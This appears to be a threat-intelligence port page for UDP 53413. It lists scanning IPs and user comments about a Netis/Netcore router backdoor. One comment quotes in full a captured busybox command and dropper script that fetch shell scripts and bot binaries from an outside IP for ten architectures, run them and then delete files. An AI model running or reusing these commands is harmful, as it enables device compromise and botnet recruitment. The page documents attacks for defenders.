Loading...
[get complete service list]
Port Information
Protocol Service Name
tcp --- ---
Top IPs Scanning
Today Yesterday
13.58.84.198 (7)18.191.173.38 (77)
3.133.84.157 (7)3.15.169.123 (70)
18.191.173.38 (7)3.23.104.96 (35)
34.68.34.66 (6)64.62.197.63 (33)
52.23.193.102 (3)64.62.197.62 (29)
3.236.93.154 (3)18.221.214.151 (28)
147.185.132.109 (2)52.15.76.227 (28)
205.210.31.198 (2)18.188.134.51 (28)
205.210.31.38 (2)3.19.240.76 (28)
206.168.34.164 (1)18.224.39.133 (28)
Port diary mentions
URL
Surge in Exploit Attempts for Netis Router Backdoor (UDP53413)
User Comments
Submitted By Date
Comment
2024-07-22 12:13:35
This busybox command was sent to UDP socket: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/8UsA.sh; curl -O http://5.59.248.206/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 5.59.248.206 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 5.59.248.206; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.59.248.206 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * 8UsA.sh file tries to load and execute backdoor for 10 different architectures: #!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.x86; curl -O http://5.59.248.206/IGz.x86;cat IGz.x86 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mips; curl -O http://5.59.248.206/IGz.mips;cat IGz.mips >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mpsl; curl -O http://5.59.248.206/IGz.mpsl;cat IGz.mpsl >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm; curl -O http://5.59.248.206/IGz.arm;cat IGz.arm >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm5; curl -O http://5.59.248.206/IGz.arm5;cat IGz.arm5 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm6; curl -O http://5.59.248.206/IGz.arm6;cat IGz.arm6 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm7; curl -O http://5.59.248.206/IGz.arm7;cat IGz.arm7 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.ppc; curl -O http://5.59.248.206/IGz.ppc;cat IGz.ppc >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.m68k; curl -O http://5.59.248.206/IGz.m68k;cat IGz.m68k >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.sh4; curl -O http://5.59.248.206/IGz.sh4;cat IGz.sh4 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
2016-08-01 00:23:46
The devices causing this traffic seem to be IoT devices (DVR's IPCAM's etc.), possibly part of LizzardStresser or another botnet based on it
2016-02-03 10:29:11
This appears to be an attack against netcore routers - udp port 53413. It attempts to run various busybox / shell commands.
CVE Links
CVE # Description